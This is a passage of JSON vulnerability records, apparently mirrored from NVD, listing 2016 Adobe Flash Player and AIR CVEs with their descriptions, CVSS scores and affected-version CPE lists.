"vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:18.0.0.326:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.207:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk_\\\\\\&_compiler:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.185:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.226:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.559:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.245:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.286:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.228:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:01", "description": "Use-after-free vulnerability in Adobe Flash Player before 18.0.0.329 and 19.x and 20.x before 20.0.0.306 on Windows and OS X and before 11.2.202.569 on Linux, Adobe AIR before 20.0.0.260, Adobe AIR SDK before 20.0.0.260, and Adobe AIR SDK & Compiler before 20.0.0.260 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-0973, CVE-2016-0975, CVE-2016-0982, CVE-2016-0983, and CVE-2016-0984.\n<a href=\"http://cwe.mitre.org/data/definitions/416.html\">CWE-416: Use After Free</a>", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-02-10T20:59:00", "title": "CVE-2016-0974", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0974"], "modified": "2017-09-10T01:29:00", "cpe": ["cpe:/a:adobe:flash_player:20.0.0.286", "cpe:/a:adobe:flash_player:20.0.0.228", "cpe:/a:adobe:flash_player:19.0.0.207", "cpe:/a:adobe:flash_player:11.2.202.559", "cpe:/a:adobe:air:20.0.0.233", "cpe:/a:adobe:flash_player:20.0.0.235", "cpe:/a:adobe:air_sdk:20.0.0.233", "cpe:/a:adobe:air_sdk_\\\\\\&_compiler:20.0.0.233", "cpe:/a:adobe:flash_player:18.0.0.326", "cpe:/a:adobe:flash_player:19.0.0.226", "cpe:/a:adobe:flash_player:19.0.0.245", "cpe:/a:adobe:flash_player:19.0.0.185"], "id": "CVE-2016-0974", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0974", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:18.0.0.326:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.207:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk_\\\\\\&_compiler:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.185:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.226:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.559:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.245:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.286:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.228:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:00", "description": "Adobe Flash Player before 18.0.0.329 and 19.x and 20.x before 20.0.0.306 on Windows and OS X and before 11.2.202.569 on Linux, Adobe AIR before 
20.0.0.260, Adobe AIR SDK before 20.0.0.260, and Adobe AIR SDK & Compiler before 20.0.0.260 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-0965, CVE-2016-0966, CVE-2016-0967, CVE-2016-0968, CVE-2016-0969, CVE-2016-0970, CVE-2016-0972, CVE-2016-0976, CVE-2016-0977, CVE-2016-0978, CVE-2016-0979, CVE-2016-0980, and CVE-2016-0981.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-02-10T20:59:00", "title": "CVE-2016-0964", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0964"], "modified": "2017-09-10T01:29:00", "cpe": ["cpe:/a:adobe:flash_player:20.0.0.286", "cpe:/a:adobe:flash_player:20.0.0.228", "cpe:/a:adobe:flash_player:19.0.0.207", "cpe:/a:adobe:flash_player:11.2.202.559", "cpe:/a:adobe:air:20.0.0.233", "cpe:/a:adobe:flash_player:20.0.0.235", "cpe:/a:adobe:air_sdk:20.0.0.233", "cpe:/a:adobe:air_sdk_\\\\\\&_compiler:20.0.0.233", "cpe:/a:adobe:flash_player:18.0.0.326", "cpe:/a:adobe:flash_player:19.0.0.226", "cpe:/a:adobe:flash_player:19.0.0.245", 
"cpe:/a:adobe:flash_player:19.0.0.185"], "id": "CVE-2016-0964", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0964", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:18.0.0.326:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.207:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk_\\\\\\&_compiler:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.185:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.226:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.559:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.245:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.286:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.228:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:01", "description": "Adobe Flash Player before 18.0.0.329 and 19.x and 20.x before 20.0.0.306 on Windows and OS X and before 11.2.202.569 on Linux, Adobe AIR before 20.0.0.260, Adobe AIR SDK before 20.0.0.260, and Adobe AIR SDK & Compiler before 20.0.0.260 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-0964, CVE-2016-0965, CVE-2016-0966, CVE-2016-0967, CVE-2016-0968, CVE-2016-0969, CVE-2016-0970, CVE-2016-0972, CVE-2016-0976, CVE-2016-0977, CVE-2016-0978, CVE-2016-0980, and CVE-2016-0981.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": 
"2016-02-10T20:59:00", "title": "CVE-2016-0979", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0979"], "modified": "2016-12-06T03:06:00", "cpe": ["cpe:/a:adobe:flash_player:20.0.0.286", "cpe:/a:adobe:flash_player:20.0.0.228", "cpe:/a:adobe:flash_player:19.0.0.207", "cpe:/a:adobe:flash_player:11.2.202.559", "cpe:/a:adobe:air:20.0.0.233", "cpe:/a:adobe:flash_player:20.0.0.235", "cpe:/a:adobe:air_sdk:20.0.0.233", "cpe:/a:adobe:air_sdk_\\\\\\&_compiler:20.0.0.233", "cpe:/a:adobe:flash_player:18.0.0.326", "cpe:/a:adobe:flash_player:19.0.0.226", "cpe:/a:adobe:flash_player:19.0.0.245", "cpe:/a:adobe:flash_player:19.0.0.185"], "id": "CVE-2016-0979", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0979", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:18.0.0.326:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.207:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk_\\\\\\&_compiler:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.185:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.226:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.559:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.245:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.286:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.228:*:*:*:*:*:*:*"]}, 
{"lastseen": "2021-02-02T06:28:01", "description": "Adobe Flash Player before 18.0.0.329 and 19.x and 20.x before 20.0.0.306 on Windows and OS X and before 11.2.202.569 on Linux, Adobe AIR before 20.0.0.260, Adobe AIR SDK before 20.0.0.260, and Adobe AIR SDK & Compiler before 20.0.0.260 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-0964, CVE-2016-0965, CVE-2016-0966, CVE-2016-0967, CVE-2016-0969, CVE-2016-0970, CVE-2016-0972, CVE-2016-0976, CVE-2016-0977, CVE-2016-0978, CVE-2016-0979, CVE-2016-0980, and CVE-2016-0981.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-02-10T20:59:00", "title": "CVE-2016-0968", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0968"], "modified": "2016-12-06T03:06:00", "cpe": ["cpe:/a:adobe:flash_player:20.0.0.286", "cpe:/a:adobe:flash_player:20.0.0.228", "cpe:/a:adobe:flash_player:19.0.0.207", "cpe:/a:adobe:flash_player:11.2.202.559", "cpe:/a:adobe:air:20.0.0.233", "cpe:/a:adobe:flash_player:20.0.0.235", 
"cpe:/a:adobe:air_sdk:20.0.0.233", "cpe:/a:adobe:air_sdk_\\\\\\&_compiler:20.0.0.233", "cpe:/a:adobe:flash_player:18.0.0.326", "cpe:/a:adobe:flash_player:19.0.0.226", "cpe:/a:adobe:flash_player:19.0.0.245", "cpe:/a:adobe:flash_player:19.0.0.185"], "id": "CVE-2016-0968", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0968", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:18.0.0.326:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.207:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk_\\\\\\&_compiler:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.185:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.226:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.559:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.245:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.286:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.228:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:01", "description": "Heap-based buffer overflow in Adobe Flash Player before 18.0.0.329 and 19.x and 20.x before 20.0.0.306 on Windows and OS X and before 11.2.202.569 on Linux, Adobe AIR before 20.0.0.260, Adobe AIR SDK before 20.0.0.260, and Adobe AIR SDK & Compiler before 20.0.0.260 allows attackers to execute arbitrary code via unspecified vectors.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-02-10T20:59:00", "title": "CVE-2016-0971", "type": 
"cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0971"], "modified": "2017-09-10T01:29:00", "cpe": ["cpe:/a:adobe:flash_player:20.0.0.286", "cpe:/a:adobe:flash_player:20.0.0.228", "cpe:/a:adobe:flash_player:19.0.0.207", "cpe:/a:adobe:flash_player:11.2.202.559", "cpe:/a:adobe:air:20.0.0.233", "cpe:/a:adobe:flash_player:20.0.0.235", "cpe:/a:adobe:air_sdk:20.0.0.233", "cpe:/a:adobe:air_sdk_\\\\\\&_compiler:20.0.0.233", "cpe:/a:adobe:flash_player:18.0.0.326", "cpe:/a:adobe:flash_player:19.0.0.226", "cpe:/a:adobe:flash_player:19.0.0.245", "cpe:/a:adobe:flash_player:19.0.0.185"], "id": "CVE-2016-0971", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0971", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:18.0.0.326:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.207:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk_\\\\\\&_compiler:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.185:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.226:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.559:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.245:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.286:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.228:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:01", "description": "Adobe Flash 
Player before 18.0.0.329 and 19.x and 20.x before 20.0.0.306 on Windows and OS X and before 11.2.202.569 on Linux, Adobe AIR before 20.0.0.260, Adobe AIR SDK before 20.0.0.260, and Adobe AIR SDK & Compiler before 20.0.0.260 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-0964, CVE-2016-0965, CVE-2016-0966, CVE-2016-0967, CVE-2016-0968, CVE-2016-0969, CVE-2016-0970, CVE-2016-0972, CVE-2016-0976, CVE-2016-0977, CVE-2016-0979, CVE-2016-0980, and CVE-2016-0981.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-02-10T20:59:00", "title": "CVE-2016-0978", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0978"], "modified": "2016-12-06T03:06:00", "cpe": ["cpe:/a:adobe:flash_player:20.0.0.286", "cpe:/a:adobe:flash_player:20.0.0.228", "cpe:/a:adobe:flash_player:19.0.0.207", "cpe:/a:adobe:flash_player:11.2.202.559", "cpe:/a:adobe:air:20.0.0.233", "cpe:/a:adobe:flash_player:20.0.0.235", "cpe:/a:adobe:air_sdk:20.0.0.233", "cpe:/a:adobe:air_sdk_\\\\\\&_compiler:20.0.0.233", 
"cpe:/a:adobe:flash_player:18.0.0.326", "cpe:/a:adobe:flash_player:19.0.0.226", "cpe:/a:adobe:flash_player:19.0.0.245", "cpe:/a:adobe:flash_player:19.0.0.185"], "id": "CVE-2016-0978", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0978", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:18.0.0.326:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.207:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk_\\\\\\&_compiler:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.185:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.226:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.559:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.245:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.286:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.228:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:01", "description": "Adobe Flash Player before 18.0.0.329 and 19.x and 20.x before 20.0.0.306 on Windows and OS X and before 11.2.202.569 on Linux, Adobe AIR before 20.0.0.260, Adobe AIR SDK before 20.0.0.260, and Adobe AIR SDK & Compiler before 20.0.0.260 allow attackers to execute arbitrary code by leveraging an unspecified \"type confusion.\"\n<a href=\"http://cwe.mitre.org/data/definitions/843.html\">CWE-843: Access of Resource Using Incompatible Type ('Type Confusion')</a>", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": 
"2016-02-10T20:59:00", "title": "CVE-2016-0985", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0985"], "modified": "2017-09-10T01:29:00", "cpe": ["cpe:/a:adobe:flash_player:20.0.0.286", "cpe:/o:redhat:enterprise_linux_desktop:5.0", "cpe:/a:adobe:flash_player:20.0.0.228", "cpe:/a:adobe:flash_player:19.0.0.207", "cpe:/a:adobe:flash_player:11.2.202.559", "cpe:/a:adobe:air:20.0.0.233", "cpe:/o:opensuse:linux_enterprise_desktop:11", "cpe:/a:adobe:flash_player:20.0.0.235", "cpe:/a:opensuse:nonfree:13.2", "cpe:/o:redhat:enterprise_linux_supplementary:5.0", "cpe:/o:redhat:enterprise_linux_server_supplementary_eus:6.7z", "cpe:/o:redhat:enterprise_linux_workstation_supplementary:6.0", "cpe:/a:opensuse:nonfree:13.1", "cpe:/o:redhat:enterprise_linux_server_supplementary:6.0", "cpe:/a:adobe:air_sdk:20.0.0.233", "cpe:/o:redhat:enterprise_linux_desktop_supplementary:6.0", "cpe:/a:adobe:air_sdk_\\\\\\&_compiler:20.0.0.233", "cpe:/a:adobe:flash_player:18.0.0.326", "cpe:/a:adobe:flash_player:19.0.0.226", "cpe:/a:adobe:flash_player:19.0.0.245", "cpe:/a:adobe:flash_player:19.0.0.185", "cpe:/o:opensuse:linux_enterprise_desktop:12", "cpe:/o:opensuse:linux_enterprise_workstation_extension:12"], "id": "CVE-2016-0985", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0985", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:opensuse:linux_enterprise_desktop:12:sp1:*:*:*:*:*:*", 
"cpe:2.3:a:adobe:flash_player:18.0.0.326:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:linux_enterprise_workstation_extension:12:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.207:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:linux_enterprise_desktop:12:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary_eus:6.7z:*:*:*:*:*:*:*", "cpe:2.3:a:opensuse:nonfree:13.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk_\\\\\\&_compiler:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:opensuse:nonfree:13.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.185:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:linux_enterprise_desktop:11:sp4:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.226:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.559:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.245:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.286:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_supplementary:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.228:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:linux_enterprise_workstation_extension:12:sp1:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary:6.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:00", "description": "Adobe Flash Player before 18.0.0.329 and 19.x and 20.x before 20.0.0.306 on Windows and OS X and before 11.2.202.569 on Linux, Adobe AIR before 20.0.0.260, Adobe AIR SDK before 20.0.0.260, and Adobe AIR SDK & Compiler before 20.0.0.260 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-0964, CVE-2016-0965, CVE-2016-0966, 
